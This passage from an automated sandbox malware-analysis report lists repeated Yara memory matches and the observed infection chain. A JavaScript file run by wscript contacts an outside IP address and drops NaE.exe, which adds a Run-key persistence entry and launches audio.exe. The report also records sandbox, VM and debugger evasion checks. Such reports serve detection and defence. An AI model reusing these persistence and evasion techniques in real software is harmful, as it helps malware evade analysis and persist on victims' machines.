                        Source: Yara match File source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match File source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara match File source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audio
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: Yara match; File source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match; File source: Process Memory Space: NaE.exe PID: 7716, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: audio.exe PID: 7888, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: audio.exe PID: 8088, type: MEMORYSTR
                        Source: Yara match; File source: Process Memory Space: audio.exe PID: 568, type: MEMORYSTR
                        Source: NaE.exe, 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, audio.exe, 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Memory allocated: 2210000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Memory allocated: 2460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Memory allocated: 4460000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 2220000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 26F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 23B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 670000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 24E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 44E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 2220000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 25E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Memory allocated: 23F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe TID: 7736; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe TID: 8112; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe TID: 7308; Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local\Temp
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Desktop\desktop.ini
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\AppData\Local
                        Source: C:\Windows\System32\wscript.exe; File opened: C:\Users\user\Documents\desktop.ini
                        Source: audio.exe, 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
                        Source: audio.exe, 00000008.00000002.2645719105.0000000000784000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
                        Source: wscript.exe, 00000003.00000002.1404205664.0000027D83540000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                        Source: wscript.exe, 00000000.00000003.1398114001.0000015E7F9EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401872911.0000015E7F9EC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1401426201.0000015E7F9A0000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000003.00000003.1400060291.0000027D83540000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{F
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_0040ADB0 GetProcessHeap,HeapFree,4_2_0040ADB0
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\System32\wscript.exe; File created: NaE.exe.3.dr
                        Source: C:\Windows\System32\wscript.exe; Network Connect: 51.254.27.105 443
                        Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
                        Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\Temp\NaE.exe "C:\Users\user\AppData\Local\Temp\NaE.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
                        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
                        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\audio.exe "C:\Users\user\AppData\Local\Temp\audio.exe"
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: GetLocaleInfoA,4_2_00417A20
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\audio.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\NaE.exe; Code function: 4_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,4_2_00412A15
                        Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                        Lowering of HIPS / PFW / Operating System Security Settings

                        Source: Yara match; File source: 10.3.audio.exe.73ed50.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.3505f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3485f90.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.26a0000.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3485f90.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21023f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e23f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60000.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.26a0000.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.3.audio.exe.73ed50.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21214ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21223f6.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620f08.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.50b0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3466478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0000.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.3715f90.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21023f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f6478.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f5570.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f5570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60f08.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0000.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.36f6478.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.50c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e5570.5.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.50c0000.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21623f6.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.3.NaE.exe.782700.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3465570.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.3.NaE.exe.782700.0.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21223f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.3715f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.3.audio.exe.6dfc80.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.34e5570.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60f08.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.4a60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e14ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.50c0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.3605f90.4.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21623f6.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21614ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3465570.8.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.3505f90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.50b0000.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.3605f90.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e23f6.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.22d0f08.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.21014ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.21614ee.2.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.21e14ee.1.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.21214ee.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e6478.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 10.2.audio.exe.2310f08.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 12.2.audio.exe.35e6478.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 4.2.NaE.exe.3466478.7.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.2.audio.exe.2620000.3.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 8.3.audio.exe.6dfc80.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.audio.exe.21014ee.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.audio.exe.2310000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.NaE.exe.50c0000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
